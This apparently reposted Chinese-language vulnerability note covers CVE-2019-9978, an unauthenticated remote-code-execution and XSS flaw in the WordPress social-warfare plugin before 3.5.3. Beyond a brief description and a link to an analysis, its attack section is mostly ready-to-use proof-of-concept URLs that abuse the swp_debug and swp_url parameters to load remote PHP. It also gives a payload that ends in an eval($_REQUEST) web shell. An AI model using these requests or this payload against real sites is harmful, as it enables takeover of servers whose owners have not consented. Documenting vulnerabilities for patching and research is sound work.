CVE-2019-9978
影响版本:WordPress social-warfare < 3.5.3
漏洞描述:WordPress是一套使用PHP语言开发的博客平台,该平台支持在PHP和MySQL的服务器上架设个人博客网站。social-warfare plugin是使用在其中的一个社交平台分享插件,其3.5.3之前版本存在跨站脚本攻击(XSS)和远程代码执行(RCE)漏洞。远程攻击者可借助这些漏洞,运行任意PHP代码,在无需身份验证的情况下实现对网站和服务器的控制。
攻击:
RCE
●漏洞分析:https://paper.seebug.org/919/
●Poc:
○http://127.0.0.1/wordpress/wp-admin/[xxx].php?swp_debug=load_options&swp_url=http://127.0.0.1/1.php -> xxx.php 不能为前台能访问的路径
○http://127.0.0.1/wordpress/wp-admin/[xxx].php?swp_debug=load_options&swp_url=http://127.0.0.1/rce.txt&test=phpinfo();
●Payload
<pre> phpinfo(); eval($_REQUEST['test']) </pre>
© 版权声明
部分文章采集于互联网,若侵权请联系删除!
THE END
请登录后查看评论内容